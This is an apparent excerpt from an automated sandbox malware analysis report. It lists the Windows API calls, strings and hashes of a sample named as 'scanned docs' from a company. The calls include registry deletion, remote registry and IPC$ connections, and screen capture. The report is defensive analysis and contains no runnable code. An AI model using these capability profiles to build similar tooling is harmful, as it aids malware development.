                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030C9F1
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA68
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030B6F4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030B772
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0030B80A
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030B87E
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030B89C
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0030B8F2
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0030B904
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0030B922
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0030B983
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030B994
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      • Opcode ID: 8bf6703b6e67670c5482f4c90fad638221468dcab12895c52458113710dcce6b
                                                      • Instruction ID: a2af746a56f7b8a63df841cef5016873723821f7a4d9047da41eb3e82ca06543
                                                      • Opcode Fuzzy Hash: 8bf6703b6e67670c5482f4c90fad638221468dcab12895c52458113710dcce6b
                                                      • Instruction Fuzzy Hash: 98C18A3421A241AFD711DF14C4A4F2AFBE5BF88308F15859CE59A8B6E2CB71EC45CB91
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 003025D8
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003025E8
                                                      • CreateCompatibleDC.GDI32(?), ref: 003025F4
                                                      • SelectObject.GDI32(00000000,?), ref: 00302601
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0030266D
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003026AC
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003026D0
                                                      • SelectObject.GDI32(?,?), ref: 003026D8
                                                      • DeleteObject.GDI32(?), ref: 003026E1
                                                      • DeleteDC.GDI32(?), ref: 003026E8
                                                      • ReleaseDC.USER32(00000000,?), ref: 003026F3
                                                      Strings
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 2193f8aafde72a9eaf01b79fb9d33fb195c04568d97acb8af41229979399455f
                                                      • Instruction ID: 52f8144706616fbc94be7a4ba30620fb766a87d3233e15d7f9e8ed9b7f0c0cb3
                                                      • Opcode Fuzzy Hash: 2193f8aafde72a9eaf01b79fb9d33fb195c04568d97acb8af41229979399455f
                                                      • Instruction Fuzzy Hash: 2E610275D01219EFCF05CFA8D888AAEBBBAFF4C310F208529E955A7250D771A951CF50
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 002BDAA1
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD659
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD66B
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD67D
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD68F
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6A1
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6B3
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6C5
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6D7
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6E9
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6FB
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD70D
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD71F
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD731
                                                      • _free.LIBCMT ref: 002BDA96
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002BDAB8
                                                      • _free.LIBCMT ref: 002BDACD
                                                      • _free.LIBCMT ref: 002BDAD8
                                                      • _free.LIBCMT ref: 002BDAFA
                                                      • _free.LIBCMT ref: 002BDB0D
                                                      • _free.LIBCMT ref: 002BDB1B
                                                      • _free.LIBCMT ref: 002BDB26
                                                      • _free.LIBCMT ref: 002BDB5E
                                                      • _free.LIBCMT ref: 002BDB65
                                                      • _free.LIBCMT ref: 002BDB82
                                                      • _free.LIBCMT ref: 002BDB9A
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 6685aef5ba5e608b8e3f0ff5ed4832ea8c42108f818842f3e40821c634c524e1
                                                      • Instruction ID: cf1c3918e7bdc14e30fb3febe51e1ff8c561f7eda301fb82c2d12e55418b20c4
                                                      • Opcode Fuzzy Hash: 6685aef5ba5e608b8e3f0ff5ed4832ea8c42108f818842f3e40821c634c524e1
                                                      • Instruction Fuzzy Hash: 79316D31664706EFEB21AE38E845BD6B7E8FF00390F255819E458D7191EF31AC648B20
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 002E369C
                                                      • _wcslen.LIBCMT ref: 002E36A7
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002E3797
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 002E380C
                                                      • GetDlgCtrlID.USER32(?), ref: 002E385D
                                                      • GetWindowRect.USER32(?,?), ref: 002E3882
                                                      • GetParent.USER32(?), ref: 002E38A0
                                                      • ScreenToClient.USER32(00000000), ref: 002E38A7
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 002E3921
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 002E395D
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 4010501982-679674701
                                                      • Opcode ID: ac1256f0fb32b28e1c817a168634f8df374fe1155d84c679f0becb9152ad31de
                                                      • Instruction ID: d6865511f3ca727b31bfdb624541afbc6e7d5ea9707b30d33ff45bd5e5e0135a
                                                      • Opcode Fuzzy Hash: ac1256f0fb32b28e1c817a168634f8df374fe1155d84c679f0becb9152ad31de
                                                      • Instruction Fuzzy Hash: 3B91D471260247AFD705DF26C889BEAF7A8FF44311F808519F999C3191DB30EA65CB91
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 002E4994
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 002E49DA
                                                      • _wcslen.LIBCMT ref: 002E49EB
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 002E49F7
                                                      • _wcsstr.LIBVCRUNTIME ref: 002E4A2C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 002E4A64
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 002E4A9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 002E4AE6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 002E4B20
                                                      • GetWindowRect.USER32(?,?), ref: 002E4B8B
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
                                                      • Opcode ID: a7a75a542bcc843af7ff9468423360421cee6b9d420b4dfb86210aed7e6df64d
                                                      • Instruction ID: 2b8f9a063b5dfecd4ee7662747406b8f851e56405457b9723f47dbda51f8926a
                                                      • Opcode Fuzzy Hash: a7a75a542bcc843af7ff9468423360421cee6b9d420b4dfb86210aed7e6df64d
                                                      • Instruction Fuzzy Hash: 6D91E0314A42469FDB04EF12C884FAA77E8FF84314F44846EFD859A196DB30ED65CBA1
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0030CC64
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0030CC8D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0030CD48
                                                        • Part of subcall function 0030CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0030CCAA
                                                        • Part of subcall function 0030CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0030CCBD
                                                        • Part of subcall function 0030CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0030CCCF
                                                        • Part of subcall function 0030CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0030CD05
                                                        • Part of subcall function 0030CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0030CD28
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0030CCF3
                                                      Strings
                                                      Similarity
                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2734957052-4033151799
                                                      • Opcode ID: 2fa054b267e13bdcd04bf5c4c7a127b7938bf8daac7e1589cbfbd000be627a2c
                                                      • Instruction ID: 51ddaf6a14a49151c71a5ae9fa1232b0c8aaa289b073436e46afcb178f19c31a
                                                      • Opcode Fuzzy Hash: 2fa054b267e13bdcd04bf5c4c7a127b7938bf8daac7e1589cbfbd000be627a2c
                                                      • Instruction Fuzzy Hash: 08319071952128BBDB22CB50DC98EFFBB7CEF09740F015265F906E2290DB309E45DAA0
                                                      APIs
                                                      • timeGetTime.WINMM ref: 002EE6B4
                                                        • Part of subcall function 0029E551: timeGetTime.WINMM(?,?,002EE6D4), ref: 0029E555
                                                      • Sleep.KERNEL32(0000000A), ref: 002EE6E1
                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 002EE705
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002EE727
                                                      • SetActiveWindow.USER32 ref: 002EE746
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002EE754
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 002EE773
                                                      • Sleep.KERNEL32(000000FA), ref: 002EE77E
                                                      • IsWindow.USER32 ref: 002EE78A
                                                      • EndDialog.USER32(00000000), ref: 002EE79B
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 584dbbbde59071ba6746ab46046ac45f173feb896288be6189668e804a22757e
                                                      • Instruction ID: 7212864c92fec5f9eddbb575738cdcec0bcd5bc2b191cfc914de52ed64b205ab
                                                      • Opcode Fuzzy Hash: 584dbbbde59071ba6746ab46046ac45f173feb896288be6189668e804a22757e
                                                      • Instruction Fuzzy Hash: 9C21A8B02E0385AFEF035F22EC89B667B6DF75A34AF555424F445821B1DBB1AC108B15
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002EEA5D
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002EEA73
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002EEA84
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002EEA96
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002EEAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 7eaaf318880b2152ffe8ec473fb2aa1b3696e25021a075a3e6e1008adb5b68d1
                                                      • Instruction ID: d3240dd9188cff15ae01e5b3e6c1a01c68f22b547957773612272adcae3de58f
                                                      • Opcode Fuzzy Hash: 7eaaf318880b2152ffe8ec473fb2aa1b3696e25021a075a3e6e1008adb5b68d1
                                                      • Instruction Fuzzy Hash: 4C1154356A125A79DB21FB62DC4ADFF6ABCEBD2B00F400429F401A60D1EBB01955CAB1
                                                      APIs
                                                        • Part of subcall function 00298F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00298BE8,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298FC5
                                                      • DestroyWindow.USER32(?), ref: 00298C81
                                                      • KillTimer.USER32(00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298D1B
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 002D6973
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 002D69A1
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 002D69B8
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00298BBA,00000000), ref: 002D69D4
                                                      • DeleteObject.GDI32(00000000), ref: 002D69E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 104a94a1c39aa1b4c0bba5379d1f558608029af0ce8cb89d58f5d7fee22174f4
                                                      • Instruction ID: fabaf3d7121b4c04699baefee7d2108ab81cb37ef3620873e341cf87e5d68f23
                                                      • Opcode Fuzzy Hash: 104a94a1c39aa1b4c0bba5379d1f558608029af0ce8cb89d58f5d7fee22174f4
                                                      • Instruction Fuzzy Hash: 6C617D31522701DFCF2A9F24D958B6577F5FB46312F18951AE0829BAB0CB71ADA0CF90
                                                      APIs
                                                        • Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952
                                                      • GetSysColor.USER32(0000000F), ref: 00299862
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: b61ef155b1c091cf5bab5130eefc750fb50fa6aa117ad3e84fbf37b6a7f6523a
                                                      • Instruction ID: 87b3c26b75626baffd79436f31a92bd0c8097de9b1eec06ec80e6ffe884e0183
                                                      • Opcode Fuzzy Hash: b61ef155b1c091cf5bab5130eefc750fb50fa6aa117ad3e84fbf37b6a7f6523a
                                                      • Instruction Fuzzy Hash: 1641B031164640AFDF215F3C9C88BB93BA9BB0A330F14861DF9A2872E1E7319C91DB11
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,002CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 002E9717
                                                      • LoadStringW.USER32(00000000,?,002CF7F8,00000001), ref: 002E9720
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,002CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 002E9742
                                                      • LoadStringW.USER32(00000000,?,002CF7F8,00000001), ref: 002E9745
                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 002E9866
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: a73fbb9c03c3cd292f95df2254ec3a90310b3dfc6c814ee6d3fcb90deddcb3f6
                                                      • Instruction ID: 9f53a899cd636ca8724f8a62cc4efd79095b9448df4fbcacaff752a4b7779c33
                                                      • Opcode Fuzzy Hash: a73fbb9c03c3cd292f95df2254ec3a90310b3dfc6c814ee6d3fcb90deddcb3f6
                                                      • Instruction Fuzzy Hash: FB416C76851209AADF05FFE1CD46DEEB378AF19700F540065F20172092EA256FA9CFA1
                                                      APIs
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002E07A2
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002E07BE
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002E07DA
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002E0804
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 002E082C
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002E0837
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002E083C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: d1511a8058c7b5b10dd5621aeb0ba0232ad20dab37bae58afc8917df1acd0b61
                                                      • Instruction ID: 354caec66e8b8cc81bf462361233bd8b470556c5f0be04589a92e58ddcf4a707
                                                      • Opcode Fuzzy Hash: d1511a8058c7b5b10dd5621aeb0ba0232ad20dab37bae58afc8917df1acd0b61
                                                      • Instruction Fuzzy Hash: 52412876C21229ABDF11EFA4DC858EDB778BF08340F444169E901B31A1EB70AE55CFA0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00303C5C
                                                      • CoInitialize.OLE32(00000000), ref: 00303C8A
                                                      • CoUninitialize.OLE32 ref: 00303C94
                                                      • _wcslen.LIBCMT ref: 00303D2D
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00303DB1
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00303ED5
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00303F0E
                                                      • CoGetObject.OLE32(?,00000000,0031FB98,?), ref: 00303F2D
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00303F40
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00303FC4
                                                      • VariantClear.OLEAUT32(?), ref: 00303FD8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: 7683cbffd62a4cd840a9e9bc809e05f9ea197e0b8601294649b2dfbe46bad1c8
                                                      • Instruction ID: baf9ccecc39bf3d04878ce45b74158638e03295b6b85487fccb1837024cddff6
                                                      • Opcode Fuzzy Hash: 7683cbffd62a4cd840a9e9bc809e05f9ea197e0b8601294649b2dfbe46bad1c8
                                                      • Instruction Fuzzy Hash: EEC13271609201AFD702DF68C89496BBBEDFF89744F00491DF98A9B291DB30EE45CB52
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 002F7AF3
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002F7B8F
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 002F7BA3
                                                      • CoCreateInstance.OLE32(0031FD08,00000000,00000001,00346E6C,?), ref: 002F7BEF
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002F7C74
                                                      • CoTaskMemFree.OLE32(?,?), ref: 002F7CCC
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 002F7D57
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002F7D7A
                                                      • CoTaskMemFree.OLE32(00000000), ref: 002F7D81
                                                      • CoTaskMemFree.OLE32(00000000), ref: 002F7DD6
                                                      • CoUninitialize.OLE32 ref: 002F7DDC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: 911f9af2ba3654cbf38e2336a8c9009593ecf152fcfce71c823bf341352b08e9
                                                      • Instruction ID: 139a7eb352478c33dc5ff8d5399bec00d6a4c423c4354d23717f91b4fbe232ec
                                                      • Opcode Fuzzy Hash: 911f9af2ba3654cbf38e2336a8c9009593ecf152fcfce71c823bf341352b08e9
                                                      • Instruction Fuzzy Hash: ADC14B75A14109AFCB14DFA4C884DAEBBF9FF48344B1480A9E91ADB261DB30ED51CF90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00315504
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00315515
                                                      • CharNextW.USER32(00000158), ref: 00315544
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00315585
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0031559B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003155AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      • Opcode ID: 1dc0b9a8bea7c84b7008d0ce04b106cfcc270c4a8bf7d2ee36e467c9f6040be8
                                                      • Instruction ID: 3d8419580c73ae4f78648dd8ab63dc71a831192a0b4a0532f4eb2d1d87805189
                                                      • Opcode Fuzzy Hash: 1dc0b9a8bea7c84b7008d0ce04b106cfcc270c4a8bf7d2ee36e467c9f6040be8
                                                      • Instruction Fuzzy Hash: 8861AE30904608EFDF169F55CC84AFE7BBDEB8E321F148145F925AA290DB748AC0DB61
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002DFAAF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 002DFB08
                                                      • VariantInit.OLEAUT32(?), ref: 002DFB1A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 002DFB3A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 002DFB8D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 002DFBA1
                                                      • VariantClear.OLEAUT32(?), ref: 002DFBB6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 002DFBC3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002DFBCC
                                                      • VariantClear.OLEAUT32(?), ref: 002DFBDE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002DFBE9
